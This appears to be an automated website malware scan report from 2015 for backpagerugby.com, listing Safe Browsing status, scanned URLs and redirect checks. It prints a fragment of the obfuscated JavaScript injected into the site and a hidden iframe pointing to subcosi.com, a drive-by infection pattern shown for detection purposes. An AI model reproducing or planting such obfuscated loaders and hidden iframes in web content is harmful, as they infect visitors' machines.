Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=backpagerugby.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://backpagerugby.com/ | 403 Forbidden Content-Length: 78219 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var Decoded script: [9,9,36,90,126,27,15,48,21,102,45,0,93,63,6,120,0,63,66,123,0,45,0,93,63,96,111,141,135,132,120,129,132,45,0,27,138,81,48,15,141,138,18,114,84,78,18,87,9,9,9,36,90,54,132,45,0,54,27,18,12,9,9,30,126,0,123,96,0,126,87,9,9,9,15,48,21,102,45,0,93,63,6,72,54,36,63,0,27,33,24,36,90,54,132,45,0,126,96,54,21,69,138,105,63,63,3,39,99,99,96,102,81,21,48,96,36,6,21,48,45,99,21,48,102,93,63,75,6,3,105,3,138,126,72,36,15,63,105,69,138,60,84,138,126,105,0,36,120,105,63,69,138,60,84,138,126,96,63,141,123 <iframe src='http://subcosi.com/count2.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://fantasyguppy.com/phpinc/home_center.php | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 12:24:15 GMT Location: http://ww15.fantasyguppy.com/phpinc/home_center.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze23 | clean |
http://ww15.fantasyguppy.com/phpinc/home_center.php | 404 Not Found Content-Length: 12844 Content-Type: text/html | clean |
http://www.google.com/adsense/domains/caf.js | 200 OK Content-Length: 203791 Content-Type: text/javascript | clean |
http://fantasyguppy.com/js/parking_caf_281_1409192.js | 404 Not Found Content-Length: 227 Content-Type: text/html | clean |
http://fantasyguppy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: backpagerugby.com
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Fri, 30 Jan 2015 12:24:14 GMT
Accept-Ranges: bytes
ETag: "8c92ae-1318b-d5971780"
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Content-Length: 78219
Content-Type: text/html
Last-Modified: Sun, 18 Sep 2011 17:48:30 GMT
...78219 bytes of data.
GET / HTTP/1.1
Host: backpagerugby.com
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Fri, 30 Jan 2015 12:24:14 GMT
Accept-Ranges: bytes
ETag: "8c92ae-1318b-d5971780"
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Content-Length: 78219
Content-Type: text/html
Last-Modified: Sun, 18 Sep 2011 17:48:30 GMT
...78219 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: backpagerugby.com
Referer: http://www.google.com/search?q=backpagerugby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: backpagerugby.com
Referer: http://www.google.com/search?q=backpagerugby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.